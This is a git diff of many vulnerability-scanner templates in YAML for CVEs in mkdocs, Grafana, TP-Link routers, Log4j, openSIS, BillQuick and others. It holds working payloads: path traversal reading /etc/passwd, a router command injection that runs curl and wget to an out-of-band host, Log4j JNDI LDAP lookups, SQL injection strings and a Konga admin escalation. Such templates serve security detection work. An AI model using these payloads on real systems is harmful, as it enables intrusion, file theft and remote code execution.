directory traversal vulnerability. reference: + - https://github.com/mkdocs/mkdocs/pull/2604 - https://github.com/nisdn/CVE-2021-40978 - https://nvd.nist.gov/vuln/detail/CVE-2021-40978 - tags: cve,cve2021,mkdocs,lfi - description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1." + - https://github.com/mkdocs/mkdocs + - https://github.com/mkdocs/mkdocs/issues/2601 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-40978 cwe-id: CWE-22 + epss-score: 0.0345 + epss-percentile: 0.90463 + cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: mkdocs + product: mkdocs + tags: cve,cve2021,mkdocs,lfi -requests: +http: - method: GET path: - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' matchers-condition: and matchers: - - type: regex + part: body regex: - "root:[x*]:0:0:" - part: body - type: status status: - 200 +# digest: 490a00463044022051fe4885f17ecb3068259162af6afb01b04b6784cd4bf9539857db99cc8263bc02202093c9039245b45870d4691050a508dfe974999234e8da26e3b95a9d65ecedb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-41192.yaml b/poc/cve/CVE-2021-41192.yaml index b01dc66949..0dbe5c2c26 100644 --- a/poc/cve/CVE-2021-41192.yaml +++ b/poc/cve/CVE-2021-41192.yaml @@ -1,40 +1,27 @@ id: CVE-2021-41192 - info: name: Redash Setup Configuration - Default Secrets Disclosure author: bananabr severity: medium - description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value. - remediation: | - Remove or update the default secrets in the Redash setup configuration file. + description: "Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value." reference: - https://hackerone.com/reports/1380121 - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv - https://nvd.nist.gov/vuln/detail/CVE-2021-41192 - - https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214 + metadata: + shodan-query: http.favicon.hash:698624197 + tags: cve,cve2021,redash,auth-bypass classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N - cvss-score: 6.5 + cvss-score: 6.50 cve-id: CVE-2021-41192 cwe-id: CWE-1188 - epss-score: 0.00805 - epss-percentile: 0.79737 - cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: "redash" - product: "redash" - shodan-query: http.favicon.hash:698624197 - tags: hackerone,cve,cve2021,redash,auth-bypass - -http: +requests: - method: GET path: - "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs" - "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs" - stop-at-first-match: true - matchers-condition: and matchers: - type: word @@ -43,8 +30,8 @@ http: - "Enter your new password:" - "redash" condition: and - - type: status status: - 200 -# digest: 4b0a00483046022100dd7ef1492189229093bdf21e68ed2b0fcc1830e419627ac08625096f0b7e0f93022100ac11bc910f3991a39c9c69d87a5db97af98a79ca2989067965699afe7d30dfce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/23 diff --git a/poc/cve/CVE-2021-41266.yaml b/poc/cve/CVE-2021-41266.yaml index e627cd3b4b..8c35979048 100644 --- a/poc/cve/CVE-2021-41266.yaml +++ b/poc/cve/CVE-2021-41266.yaml @@ -1,22 +1,31 @@ id: CVE-2021-41266 + info: name: MinIO Operator Console Authentication Bypass author: alevsk severity: critical description: | MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. - remediation: "Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token." + remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.' reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41266 - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36 - https://github.com/minio/console/pull/1217 - tags: cve,cve2021,minio classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-41266 cwe-id: CWE-306 -requests: + epss-score: 0.05383 + epss-percentile: 0.9231 + cpe: cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: min + product: minio_console + tags: cve,cve2021,minio + +http: - raw: - | POST /api/v1/login/oauth2/auth HTTP/1.1 @@ -25,20 +34,22 @@ requests: Content-Type: application/json {"code":"test","state":"test"} + matchers-condition: and matchers: - - type: status - status: - - 201 - - 200 - condition: or - type: word part: body words: - "sessionId" + - type: word part: header words: - "token" -# Enhanced by mp on 2022/03/06 + - type: status + status: + - 201 + - 200 + condition: or +# digest: 4b0a00483046022100d4f00112bf03bbb6b82a7583f280a1eb4916acc4238ab8ebfd475ab0528417530221008f70ddddee0a3baba5cad0f9162481428f4befd198bfe56b971e16f9926032fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-41291.yaml b/poc/cve/CVE-2021-41291.yaml index 40c981d32a..019635b732 100644 --- a/poc/cve/CVE-2021-41291.yaml +++ b/poc/cve/CVE-2021-41291.yaml @@ -1,39 +1,27 @@ id: CVE-2021-41291 - info: name: ECOA Building Automation System - Directory Traversal Content Disclosure author: gy741 severity: high description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41291 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html - - https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html + tags: cve,cve2021,ecoa,lfi,traversal classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2021-41291 cwe-id: CWE-22 - epss-score: 0.0476 - epss-percentile: 0.91811 - cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: ecoa - product: ecs_router_controller-ecs_firmware - tags: cve,cve2021,ecoa,lfi,traversal - -http: +requests: - raw: - | GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} - matchers: - type: regex regex: - "root:.*:0:0:" -# digest: 4a0a0047304502200ab375779c544247084df27df2110d5e8bd971a7afb0521769179671fc5c79c6022100c97200d389557ae7066e36b39411f6f4529049c4aea2d43aae22595186561f0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/06 diff --git a/poc/cve/CVE-2021-41569.yaml b/poc/cve/CVE-2021-41569.yaml index 7cbddb68f3..a65c219ae1 100644 --- a/poc/cve/CVE-2021-41569.yaml +++ b/poc/cve/CVE-2021-41569.yaml @@ -1,42 +1,28 @@ id: CVE-2021-41569 - info: - name: SAS/Internet 9.4 1520 - Local File Inclusion + name: SAS 9.4 build 1520 - Local File Inclusion author: 0x_Akoko severity: high - description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. - remediation: | - Apply the latest security patches or updates provided by SAS to fix the LFI vulnerability in the SAS/Internet 9.4 1520 application. + description: SAS/Intrnet 9.4 build 1520 and earlier allows Local File Inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. reference: - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas - - https://support.sas.com/kb/68/641.html - https://nvd.nist.gov/vuln/detail/CVE-2021-41569 + - https://support.sas.com/kb/68/641.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41569 cwe-id: CWE-829 - epss-score: 0.00978 - epss-percentile: 0.81694 - cpe: cpe:2.3:a:sas:sas\/intrnet:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: sas - product: sas\/intrnet tags: cve,cve2021,sas,lfi - -http: +requests: - method: GET path: - "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR" - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 -# digest: 4b0a00483046022100b5ed72e2112da2f28d093daf01c613d3fb7fbdaaa619c1ce41d58efdde1876d5022100c1bccde6c025af52cad8129238983b19f09549900d4f0a97f3aa8b002d4deee8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-41653.yaml b/poc/cve/CVE-2021-41653.yaml index 0b2062a76c..2595cd5ef5 100644 --- a/poc/cve/CVE-2021-41653.yaml +++ b/poc/cve/CVE-2021-41653.yaml @@ -1,33 +1,21 @@ id: CVE-2021-41653 - info: name: TP-Link - OS Command Injection + description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field. author: gy741 severity: critical - description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field. remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109". reference: - https://k4m1ll0.com/cve-2021-41653.html - https://nvd.nist.gov/vuln/detail/CVE-2021-41653 - https://www.tp-link.com/us/press/security-advisory/ - - http://tp-link.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-41653 cwe-id: CWE-94 - epss-score: 0.95374 - epss-percentile: 0.99172 - cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: tp-link - product: tl-wr840n_firmware tags: cve,cve2021,tplink,rce,router -variables: - useragent: '{{rand_base(6)}}' - -http: +requests: - raw: - | POST /cgi?2 HTTP/1.1 @@ -40,7 +28,7 @@ http: dataBlockSize=64 timeout=1 numberOfRepetitions=4 - host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}') + host=$(echo 127.0.0.1; wget http://{{interactsh-url}}) X_TP_ConnName=ewan_ipoe_d diagnosticsState=Requested - | @@ -51,17 +39,10 @@ http: Cookie: Authorization=Basic YWRtaW46YWRtaW4= [ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0 - - matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - type: word - part: interactsh_request - words: - - "User-Agent: {{useragent}}" - -# digest: 490a004630440220752d1a35c5152419dacd9908a794244472a635bd8142f442d7cc7c88b204879b0220494cf93f6429b61a87d6c82bcd93eed1ea759f32f72eb7adfbbf425ed650b72c:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/02/27 diff --git a/poc/cve/CVE-2021-41691.yaml b/poc/cve/CVE-2021-41691.yaml index 9c1638f94a..8b7aa30835 100644 --- a/poc/cve/CVE-2021-41691.yaml +++ b/poc/cve/CVE-2021-41691.yaml @@ -1,25 +1,17 @@ id: CVE-2021-41691 - info: name: openSIS Student Information System 8.0 SQL Injection author: Bartu Utku SARP severity: high description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. - remediation: | - Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691). reference: - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 - https://www.exploit-db.com/exploits/50637 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 classification: cve-id: CVE-2021-41691 - metadata: - max-request: 2 - tags: sqli,auth,edb,cve,cve2021,opensis -variables: - num: "999999999" - -http: + tags: cve,cve2021,opensis,sqli,auth +requests: - raw: - | POST /index.php HTTP/1.1 @@ -34,14 +26,15 @@ http: Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 - + student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 attack: pitchfork payloads: username: - student password: - student@123 + req-condition: true + cookie-reuse: true matchers: - type: dsl dsl: @@ -49,4 +42,4 @@ http: - 'status_code_2 == 200' condition: and -# digest: 4b0a00483046022100d69a704ad325691722917a459e5254a92c6c17b1de1bf9f45e49b81414445ce5022100f9ddad6028eb7b1ad78e82fc59de1d3a40a132b8da744cbf8057af607d694558:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/28 diff --git a/poc/cve/CVE-2021-4191.yaml b/poc/cve/CVE-2021-4191.yaml index 5d0ec2ff51..0a8ad4cbb9 100644 --- a/poc/cve/CVE-2021-4191.yaml +++ b/poc/cve/CVE-2021-4191.yaml @@ -1,33 +1,20 @@ id: CVE-2021-4191 - info: name: GitLab GraphQL API User Enumeration author: zsusac severity: medium description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses. - remediation: | - Implement rate limiting or CAPTCHA on the GraphQL API to prevent user enumeration. reference: - https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/ - https://thehackernews.com/2022/03/new-security-vulnerability-affects.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191 - - https://gitlab.com/gitlab-org/gitlab/-/issues/343898 - - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-4191.json classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-4191 - cwe-id: CWE-287 - epss-score: 0.16707 - epss-percentile: 0.95503 - cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - metadata: - max-request: 1 - vendor: gitlab - product: gitlab + cwe-id: CWE-359 tags: cve,cve2021,gitlab,api,graphql,enum,unauth - -http: +requests: - raw: - | POST /api/graphql HTTP/1.1 @@ -38,7 +25,6 @@ http: Referer: {{RootURL}}/-/graphql-explorer {"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":null,"operationName":null} - matchers-condition: and matchers: - type: word @@ -50,13 +36,12 @@ http: - '"id"' - 'gid://' condition: and - - type: status status: - 200 - extractors: - type: json json: - '.data.users.nodes[].username' -# digest: 490a00463044022072bf9b1ffd624ed45fd2cb9b4250a5336e3dccb702828e225891dcfea3aa89fc02205e75d4129bb0a9386d11ff164255aaef20eb406b50416b2cfd7c84542c7d4733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/07 diff --git a/poc/cve/CVE-2021-42258.yaml b/poc/cve/CVE-2021-42258.yaml index 002bc2d9e0..173f4fac22 100644 --- a/poc/cve/CVE-2021-42258.yaml +++ b/poc/cve/CVE-2021-42258.yaml @@ -1,30 +1,19 @@ id: CVE-2021-42258 - info: name: BillQuick Web Suite SQL Injection author: dwisiswant0 severity: critical + tags: cve,cve2021,sqli,billquick description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell. - remediation: | - Apply the latest security patches and updates provided by the vendor to fix the SQL Injection vulnerability in the BillQuick Web Suite. reference: - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware - https://nvd.nist.gov/vuln/detail/CVE-2021-42258 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-42258 cwe-id: CWE-89 - epss-score: 0.97301 - epss-percentile: 0.99844 - cpe: cpe:2.3:a:bqe:billquick_web_suite:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: bqe - product: billquick_web_suite - tags: cve,cve2021,sqli,billquick,kev - -http: +requests: - raw: - | GET / HTTP/1.1 @@ -36,36 +25,34 @@ http: Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded - __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("{{VS}}")}}&__VIEWSTATEGENERATOR={{url_encode("{{VSG}}")}}&__EVENTVALIDATION={{url_encode("{{EV}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 - - matchers: - - type: word - part: body - words: - - "System.Data.SqlClient.SqlException" - - "Incorrect syntax near" - - "_ACCOUNTLOCKED" - condition: and - + __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 + cookie-reuse: true extractors: - type: xpath name: VS internal: true + attribute: value xpath: - "/html/body/form/div/input[@id='__VIEWSTATE']" - attribute: value - - type: xpath name: VSG internal: true + attribute: value xpath: - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']" - attribute: value - - type: xpath name: EV internal: true + attribute: value xpath: - "/html/body/form/div/input[@id='__EVENTVALIDATION']" - attribute: value -# digest: 4b0a00483046022100d73e9c6cb59f6c01ab6d1d75d8415d035879849d63fc47d7d062a2c3fc53749f022100c3614ce46923c20a9dc2b916da6bbcc15ac080e82245dec9d6d23955802ca201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + matchers: + - type: word + part: body + condition: and + words: + - "System.Data.SqlClient.SqlException" + - "Incorrect syntax near" + - "_ACCOUNTLOCKED" + +# Enhanced by mp on 2022/02/27 diff --git a/poc/cve/CVE-2021-43798.yaml b/poc/cve/CVE-2021-43798.yaml index 1349e5fd93..cae1edc347 100644 --- a/poc/cve/CVE-2021-43798.yaml +++ b/poc/cve/CVE-2021-43798.yaml @@ -1,32 +1,57 @@ id: CVE-2021-43798 info: - name: Grafana v8.x Arbitrary File Read - author: z0ne,dhiyaneshDk + name: Grafana v8.x - Arbitrary File Read + author: z0ne,dhiyaneshDk,j4vaovo severity: high - description: Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is `/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline. + description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin. + remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. reference: - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p - https://nosec.org/home/detail/4914.html - https://github.com/jas502n/Grafana-VulnTips - tags: cve,cve2021,grafana,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2021-43798 + - http://packetstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-43798 + cwe-id: CWE-22 + epss-score: 0.9724 + epss-percentile: 0.99802 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + metadata: + verified: "true" + max-request: 3 + vendor: grafana + product: grafana + shodan-query: title:"Grafana" + tags: packetstorm,cve,cve2021,grafana,lfi -requests: +http: - method: GET path: - - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd" + - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini' + - '{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini' + + stop-at-first-match: true matchers-condition: and matchers: + - type: word + part: header + words: + - "text/plain" - type: regex regex: - - "root:.*:0:0" + - 'root:.*:0:([0-9]+):' + - '\/tmp\/grafana\.sock' + - '\[(fonts|extensions|Mail|files)\]' + condition: or - type: status status: - - 200 \ No newline at end of file + - 200 +# digest: 4a0a0047304502206658644f5e107854cf02bdbae1ce75a6c00762f62f671f84aa65148f37a48dc4022100c299a04bb0aad97febb71fd43b897b82d4fce500d6823b2e1c686ff95be60e9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-44103.yaml b/poc/cve/CVE-2021-44103.yaml index 2cbaa2250d..915e1a03cc 100644 --- a/poc/cve/CVE-2021-44103.yaml +++ b/poc/cve/CVE-2021-44103.yaml @@ -1,5 +1,4 @@ id: CVE-2021-44103 - info: name: KOGA 0.14.9 - Privilege Escalation author: rschio @@ -10,12 +9,10 @@ info: - https://www.exploit-db.com/exploits/50521 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44103 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.7 cve-id: CVE-2021-44103 - cwe-id: CWE-269 + cwe-id: CWE-264 tags: cve,cve2021,konga,authenticated - requests: - raw: - | @@ -24,7 +21,6 @@ requests: Content-Type: application/json {"password": "{{password}}", "identifier": "{{username}}"} - - | POST /api/user/{{id}} HTTP/1.1 Host: {{Hostname}} @@ -33,7 +29,6 @@ requests: Content-Type: application/json;charset=utf-8 {"token": "{{token}}"} - - | PUT /api/user/{{id}} HTTP/1.1 Host: {{Hostname}} @@ -42,7 +37,6 @@ requests: Content-Type: application/json;charset=utf-8 {"admin": "true", "passports": {"password": "{{password}}", "protocol": "local"}, "token": "{{token}}", "password_confirmation": "{{password}}"} - req-condition: true matchers-condition: and matchers: @@ -51,16 +45,13 @@ requests: - 'contains(body_2, "\"admin\":false")' - 'contains(body_3, "\"admin\":true")' condition: and - - type: word part: header words: - "application/json" - - type: status status: - 200 - extractors: - type: regex part: body @@ -69,7 +60,6 @@ requests: group: 1 regex: - '"id":([0-9]+)' - - type: regex part: body name: token diff --git a/poc/cve/CVE-2021-44228.yaml b/poc/cve/CVE-2021-44228.yaml index 902ff5ae82..affb8ee9a5 100644 --- a/poc/cve/CVE-2021-44228.yaml +++ b/poc/cve/CVE-2021-44228.yaml @@ -1,90 +1,48 @@ id: CVE-2021-44228 info: - name: Apache Log4j2 Remote Code Injection - author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo + name: Remote code injection in Log4j + author: melbadry9,dhiyaneshDK,daffainfo severity: critical - description: | - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. - remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). + description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. reference: - - https://logging.apache.org/log4j/2.x/security.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q - https://www.lunasec.io/docs/blog/log4j-zero-day/ - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2021-44228 - cwe-id: CWE-20,CWE-917 - epss-score: 0.97453 - epss-percentile: 0.99942 - cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: apache - product: log4j - tags: cve,cve2021,rce,oast,log4j,injection,kev -variables: - rand1: '{{rand_int(111, 999)}}' - rand2: '{{rand_int(111, 999)}}' + tags: cve,cve2021,rce,oast,log4j -http: +requests: - raw: - - | - GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1 - Host: {{Hostname}} - | GET / HTTP/1.1 Host: {{Hostname}} - Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}} - Accept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}} - Accept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}} - Access-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}} - Access-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}} - Authentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}} - Authentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}} - Cookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}} - Location: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}} - Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}} - Referer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}} - Upgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}} - User-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}} - X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}} - 